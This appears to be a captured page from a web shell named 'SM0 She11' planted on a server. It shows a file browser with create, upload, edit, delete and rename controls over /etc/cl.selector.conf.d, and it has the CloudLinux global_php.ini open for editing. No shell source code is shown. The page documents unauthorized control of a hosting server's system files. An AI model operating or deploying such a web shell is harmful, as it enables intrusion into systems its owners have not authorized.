SM0 She11
Path:
/
/
etc
/
cl.selector.conf.d
Full Path (server): /etc/cl.selector.conf.d
Create Fil3
Upl04d Fil3
📄 defaults.cfg
[E]
[D]
[R]
📄 global_php.ini
[E]
[D]
[R]
📄 native.conf
[E]
[D]
[R]
📄 php.conf
[E]
[D]
[R]
📄 php.conf.rpmsave
[E]
[D]
[R]
📄 php.extensions.conflicts
[E]
[D]
[R]
📁 php.extensions.d
Open
[D]
[R]
📄 phpextdesc.txt
[E]
[D]
[R]
📄 selector.conf
[E]
[D]
[R]
📄 symlinks.rules
[E]
[D]
[R]
Editing: global_php.ini
; This file provides global settings for php.ini of all alt-php packages ; The structure of this file: ; option = value ; To confirm changes (not affecting "date.timezone" and "error_log" options) please run: ; /usr/sbin/cagefsctl --setup-cl-selector ; To confirm changes (including "date.timezone" and "error_log" options) please run: ; /usr/bin/selectorctl --apply-global-php-ini ; or ; /usr/sbin/cagefsctl --apply-global-php-ini ; If you don't want to change error_log, but want to change date.timezone, you can execute ; selectorctl --apply-global-php-ini date.timezone ; Similarly, command ; selectorctl --apply-global-php-ini error_log ; applies error_log and all other options specified in /etc/cl.selector/global_php.ini file, except date.timezone. ; So, you can specify 0, 1 or 2 parameters from the list: error_log, date.timezone ; using --apply-global-php-ini without arguments applies all global php options including two above ; Example: ; selectorctl --apply-global-php-ini error_log ; selectorctl --apply-global-php-ini date.timezone ; selectorctl --apply-global-php-ini date.timezone error_log ; The latter command has the same effect as /usr/bin/selectorctl --apply-global-php-ini [Global PHP Settings] post_max_size=32M upload_max_filesize=32M opcache.fast_shutdown=1
Save